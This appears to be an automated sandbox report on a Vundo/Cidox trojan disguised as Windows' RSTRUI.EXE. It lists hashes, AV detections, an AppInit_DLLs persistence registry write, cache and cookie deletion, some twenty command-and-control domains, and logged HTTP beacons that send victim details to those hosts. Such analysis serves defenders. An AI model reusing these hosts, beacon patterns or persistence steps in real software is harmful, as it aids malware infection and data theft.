Analysis Date2015-05-06 18:22:26
MD5717e956da71d9bd62a46f40717d0428b
SHA116f00854ccf517025228bac3415106adbabdd1c0

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 6c3f1d719a3aadbb96dd357d08a378ed sha1: 1c37364d6b1d4cbc444919cbb7203805c789b839 size: 91648
Section_ASM2 md5: 9cd7316a3c370d5c05281969b65a4660 sha1: ab930fde7701b55eb08891bae098f468727aeffd size: 63488
Section.rdata md5: 80759194640cd0c281898748a3c7253b sha1: dcb925370efdab1968bdce434442f7fbd7245c68 size: 8192
Section.data md5: b02138ea20c5701e81389f2009bc03b7 sha1: 7f15f118c4b5e6a88eae0ed33c431eb0ca39b540 size: 5120
Section.tls md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Section.rsrc md5: c57f9dda23e74dc2dffbaa3c8425f4c6 sha1: b4ae49516f17224939910fb68e13bc1ba5f2c037 size: 34304
Timestamp2012-09-25 04:56:32
VersionLegalCopyright: © Корпорация Майкрософт. Все права защищены.
InternalName: RSTRUI.EXE
FileVersion: 5.1.2600.5512 (xpsp.080413-2108)
CompanyName: Корпорация Майкрософт
ProductName: Операционная система Microsoft® Windows®
ProductVersion: 5.1.2600.5512
FileDescription: Приложение восстановления системы
OriginalFilename: RSTRUI.EXE
PackerMicrosoft Visual C++ ?.?
PEhashed7168502630d6f765608bf68788c6f93aa2bee5
IMPhash11c52178b812c23b7febf02fc8e99619
AVAd-AwareGen:Variant.Kazy.211341
AVAlwil (avast)Vundo-XF [Trj]
AVArcabit (arcavir)Gen:Variant.Kazy.211341
AVAuthentiumW32/Cidox.A.gen!Eldorado
AVAvira (antivir)TR/Vundo.Gen7
AVBitDefenderGen:Variant.Kazy.211341
AVBullGuardGen:Variant.Kazy.211341
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)Trojan.Vundo.Gen
AVClamAVno_virus
AVDr. WebTrojan.Mayachok.17986
AVEmsisoftGen:Variant.Kazy.211341
AVEset (nod32)Win32/Kryptik.AMFU
AVFortinetW32/Citirevo.AB!tr
AVFrisk (f-prot)W32/Cidox.A.gen!Eldorado
AVF-SecureGen:Variant.Kazy.211341
AVGrisoft (avg)Generic_r.BGN
AVIkarusTrojan-Downloader.Win32.Vundo
AVK7Backdoor ( 04c4f2bf1 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesTrojan.FakeMS.ED
AVMcafeeVundo-FASV!717E956DA71D
AVMicrosoft Security EssentialsTrojanDropper:Win32/Vundo.AA
AVMicroWorld (escan)Gen:Variant.Kazy.211341
AVPadvishBackdoor.Cidox.rk
AVRisingno_virus
AVSophosMal/Vundo-M
AVSymantecTrojan.Gen
AVTrend MicroTROJ_VUNDO.SMKK
AVTwisterBackdoor.5184F65DEF6B177B
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Cookies\index.dat

Process
↳ C:\WINDOWS\Explorer.EXE

Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Cookies\cf
Creates FileC:\WINDOWS\system32\edmewoa.dll
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates ProcessC:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Winsock DNSclickbeta.ru
Winsock DNSdenadb.com
Winsock DNS91.220.35.154
Winsock DNSterrans.su
Winsock DNStryatdns.com
Winsock DNSclickclans.ru
Winsock DNSdenareclick.com
Winsock DNSfescheck.com
Winsock DNSinstrango.com
Winsock DNSverzinla.com
Winsock DNSgetintsu.com
Winsock DNStegimode.com
Winsock DNSnetrovad.com
Winsock DNSnshouse1.com
Winsock DNSveriolana.com
Winsock DNSinzavora.com
Winsock DNSodobvare.com
Winsock DNSforadns.com
Winsock DNSgetavodes.com
Winsock DNSclickstano.com

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝
C:\WINDOWS\system32\edmewoa.dll\\x00

Network Details:

DNSgetavodes.com
Type: A
204.11.56.48
DNStryatdns.com
Type: A
204.11.56.48
DNSinstrango.com
Type: A
204.11.56.48
DNSdenadb.com
Type: A
204.11.56.48
DNSforadns.com
Type: A
141.8.225.62
DNSveriolana.com
Type: A
DNSverzinla.com\032
Type: A
DNSgetintsu.com
Type: A
DNSfescheck.com
Type: A
DNSnetrovad.com
Type: A
DNSinzavora.com
Type: A
DNSodobvare.com
Type: A
DNSterrans.su
Type: A
DNStegimode.com
Type: A
DNSclickstano.com
Type: A
DNSdenareclick.com
Type: A
DNSclickbeta.ru
Type: A
DNSnshouse1.com
Type: A
DNSclickclans.ru
Type: A
HTTP GEThttp://getavodes.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=991&av=0&vm=0&al=0&p=567&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg7QMsiS3YGpeqZSlgt+V1m4Q6O23qnsotScfpT4Wm9yy
User-Agent:
HTTP GEThttp://tryatdns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=991&av=0&vm=0&al=0&p=567&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg7QMsiS3YGpeqZSlgt+V1m4Q6O23qnsotVQWSDufAQbz
User-Agent:
HTTP GEThttp://instrango.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=991&av=0&vm=0&al=0&p=567&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg7QMsiS3YGpeqZSlgt+V1m4Q6O23qnsotSxoYooL9EZM
User-Agent:
HTTP GEThttp://denadb.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=991&av=0&vm=0&al=0&p=567&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg7QMsiS3YGpeqZSlgt+V1m4Q6O23qnsotZsMSMiS09by
User-Agent:
HTTP GEThttp://foradns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=991&av=0&vm=0&al=0&p=567&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg7QMsiS3YGpeqZSlgt+V1m4Q6O23qnsote8cVxmzTldB
User-Agent:
HTTP GEThttp://91.220.35.154/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=991&av=0&vm=0&al=0&p=567&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg7QMsiS3YGpeqZSlgt+V1m4Q6O23qnsotaArFa26dot/
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 204.11.56.48:80
Flows TCP192.168.1.1:1032 ➝ 204.11.56.48:80
Flows TCP192.168.1.1:1033 ➝ 204.11.56.48:80
Flows TCP192.168.1.1:1034 ➝ 204.11.56.48:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.62:80
Flows TCP192.168.1.1:1036 ➝ 91.220.35.154:80

Raw Pcap

Strings
P.
.8
.
.
.guriVttcetorla
\
.CC
 
.
.g.
.
..8
uri.
041904B0
1Cycle through the possible initial break settings9Request that the debugger resynchronize with the debuggee
1Display debugger and debuggee version information
333f3
5.1.2600.5512
5.1.2600.5512 (xpsp.080413-2108)
7Set the initial command for new command browser windows!Toggle the verbose output setting2Display the debugger time for every debuggee event1Display debugger and debuggee version information
8Configure mapping from file extension to source language
About WinDbg
Activate window
Cascade all floating windows&Horizontally tile all floating windows$Vertically tile all floating windows
Close all source windows-Close all windows that are error placeholders"Open a new docked window container
CompanyName
CWindowClass
Debug operations
Detach the current program
Display source when possibleGPerform symbol resolution for symbol strings without a module qualifier
Dock all undocked windows
f3fff
FileDescription
FileVersion
                                 H
         (((((                  H
Halt the current program
Help contents and searches
         h((((                  H
InternalName
KERNEL32.DLL
Kernel debugging control.Cycle through the available baud rate settings
LegalCopyright
Manage event filters
Manage open windows
:Manage windows using the Multiple Document Interface styleDAutomatically open a disassembly window when source is not available
 Microsoft
mscoree.dll
Open a command browser window
Open the command window
Open the disassembly window
Open the help index
Open the help search dialog
Open the help table of contents)Open the help for the current window type)Open help for the currently selected text
"Open the process and thread window
Open the registers window
Open the scratch pad window"Open the process and thread window
OriginalFilename
ProductName
ProductVersion
Restart the Program"Stop debugging the current program
RSTRUI.EXE
Run the Program)Handle the exception and continue running1Do not handle the exception, but continue running
Step over the next statement Step out of the current function1Run the program to the line containing the cursor
StringFileInfo
Toggle the status bar on or off
Toggle the status bar on or off,View or edit the font for the current window
Toggle the toolbar on or off
Trace into the next statement
Translation
Undock all docked windows
VarFileInfo
View program options
View the module list
View WinDbg's command line
VS_VERSION_INFO
 Window arrangement and selection
 Windows
                          
$ @!@!
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
0AFa4_SU
0A@@Ju
/>0#fp
 0i*z0
0SSSSS
0trth{
0:@@\`x%
1k2;BK
1ka g s
2]0ueE%
)29b:rybirz
2FtOr 
3UYjukf
4{g]}E;
'4";gkw
5#!n$$
6aUpteS4d isb~
6AZnga H
6>ghU)?
@6t:~uF
{7AiGu
7nttu?u
@;$`@8@
8;7780
8ml.iC
[;8MUu
8%.[zNO
9W~MDh
A2y:]hy
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
ADVAPI32.dll
ADVAPI32.DLL
AdviseInUserModeA
*-aFii
AgV0l}zGcP
An application has made an attempt to load the C runtime library incorrectly.
AroeeR=bLLb\
`_ASM2
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
b2H!54
B;>BRB
BeginPaint
}b^}IfH
BK@_BX
Bs Etk
b<Sx<x
/``CD4v
clGd?=%vmr9
CloseHandle
cltAtCit
CorExitProcess
CoTaskMemAlloc
CreateBitmap
CreateSolidBrush
CreateWindowExA
c rr #r
- CRT not initialized
[]cUg S
CwSPa4
`C,X+N
@.data
DateTime:%04d.%02d:%d
|DCtW-
DDDDDC
DDDDDDDDDD
dddd, MMMM dd, yyyy
December
DecodePointer
DeleteCriticalSection
DestroyWindow
DeviceIoControl
DispatchMessageA
 ;Dl H 
dmG`DMT
dnc,gnTbt(
:dO84+7b,0
DOMAIN error
DrawTextA
dr" ear 
$dRFL4P
Dx*TPx
e0eeMW
E2KGeelss	
e!eetehe
eefi;!rai
)|Ee#k
*/eI+	L	
'e;J0h
EncodePointer
EndPaint
enep*$eim
EnterCriticalSection
epseGH:vdM
ePVY=b
. { e,rl@lg
err3T$trr0L
eSc_leS
Es]m[z
E@uu$<<
ExitProcess
@@f@@(
@F\.2=
f5rk kt
f?7hQW
	)FDGj
Fd"S3z
February
@)fFFtYM
f_h(_u
FindResourceA
- floating point support not loaded
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
^Fr)_0
FreeEnvironmentStringsA
FreeEnvironmentStringsW
Friday
frvB)7V
'fx=1z
-G4j%R
g=d=dO
GDI32.dll
GetACP
GetActiveWindow
GetClientRect
GetCommandLineA
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetDeviceCaps
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetMessageA
GetModuleFileNameA
GetModuleHandleA
GetModuleHandleW
GetOEMCP
GetProcAddress
GetProcessWindowStation
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemMetrics
GetSystemTimeAsFileTime
GetTickCount
GetUserObjectInformationA
GetVersion
GjV>@m
%g-ptO
Gutdg7
@h33&h
hb=}C.9
HeapAlloc
HeapCreate
HeapFree
HeapReAlloc
HeapSize
HH:mm:ss
Hi0"T{
hOZe e
%hqxA3
htlHe?XEngGV
i\6eo/pL&oi
iaio-Slnoc
iePh\QVoHA/
InitializeCriticalSectionAndSpinCount
InterlockedDecrement
InterlockedIncrement
IsDebuggerPresent
IsValidCodePage
`iTSiF
{']IWJO$T
iYrdmW
JanFebMarAprMayJunJulAugSepOctNovDec
January
JavaStudioClass
JEg%o81
j@j ^V
jnga .]e
J:oUh?K
j-tI cGt 
K4,B,B
?*K}+6C`
KERNEL32.dll
'@kJ9A
kJ@"[%Zs
kRJ[xuV
K-tr  
K`;u\ ;L
lanrD^0
	L~,bbCnHQ?
LCMapStringA
LCMapStringW
lC#repW3
LczXzon
LeaveCriticalSection
#?~LJ_
</LNFR[
LoadAcceleratorsA
LoadCursorA
LoadIconA
LoadIconW
LoadLibraryA
LoadResource
LoadStringA
LockResource
lstrcmpiA
;Lyk/^
M6GjEu
MessageBoxA
Microsoft Visual C++ Runtime Library
Midp31ii
MM/dd/yy
Monday
M skykGocnar
MsteH]eled
MultiByteToWideChar
M\yw,_s
N /0?>
N	&EtmV
NffLono@wn
nga $Aaxae+b
n'Hj+&
N]MwPU
NN~>Hv
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
N<!ran>
October
@;oe]aZ
oePDX$
OgrroA
oiBtb2
ole32.dll
oNun!5t
opbQN4
ote&Sl
o:TS"Eu
owIcoVrn)ti
/p2j`9
pACeRsP
pBv!a'
Please contact the application's support team for more information.
pMcI5JuD
PN'LU:
PPPPPPPP
Program: 
<program name unknown>
}pRQ#aY
PtWs+R
- pure virtual function call
Pw[jcn
pW>u#h;
Qaa[g8
qltdo)6
QueryPerformanceCounter
:R)29B
`.rdata
rea5S#0215>9 
Rectangle
RegConnectRegistryA
RegisterClassExA
`rTF0X
RtlUnwind
runtime error 
Runtime Error!
:;+@$S
@S` @ @
s~ABZ8
?sAite
Saturday
scm32.dll
September
serd}1epaP@@
SetFilePointer
SetHandleCount
SetLastError
SetParent
SetUnhandledExceptionFilter
S{$,FE
ShowWindow
SING error
.Sixieb
.sNede0k<NRod
snelUAbvslOTIoae^
$S$Rdz0
strcat
Sunday
SunMonTueWedThuFriSat
tcr\@rridmEAoie
TerminateProcess
TextOutA
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
Thursday
tIr%sedum
< tK<	tG
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
toHcoYefYn
&	TOnu%
TranslateAcceleratorA
TranslateMessage
t}'Rt[
t"SS9]
tt:aGXsPHtt
TT>?+F
#ttlon
t$<"u	3
Tuesday
;t$,v-
t+WWVPV
-ty c7noH
t^%yiCF
tzDJ/~
ueany5=truen
uF5rna
uhyu6ia8ry'regce
# UL6Rk-
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
UpdateWindow
UQPXY]Y[
URPQQh
USER32.dll
USER32.DLL
u-t| t
UVLml/
}?UW0v
*|v$1l\_
V1-lo 
VHeef^
VirtualAlloc
VirtualFree
vk,2/S
v	N+D$
Vprh nvum$!ry
vshoFP
V}!u:W
@@(@@v@@x@@
Wab|D!ayCco\tM
Wednesday
WideCharToMultiByte
W{ mkw	0EoPg+t
WriteFile
wsprintfA
wtDDDDDDDC
Wt	j~^
W}tnaX1t
wwCsii]
wwwws0
wwwwwwws
wwwwwwww?
wwwwwwwws
wwwwwwwwww
wwwwwwwwwwwww
wwwwwwwwwwwwww
wwwwwwwwwwwwwwz
wwwwwwwwwwwwwz
wwwwwwwwwwwwwzwwww
wwwwwwwwzww
wwwwwwwxx
wwwwwwwz
wwwwwwwzww
XArSaZ
yda<HaPtWFns
yeae@ldSih
?Yn9G<
>=Yt1j
Y@w\'-PF,Y@
,YXg5p
+`YZq$
Z0W1H'O
ZAiHle
zODffM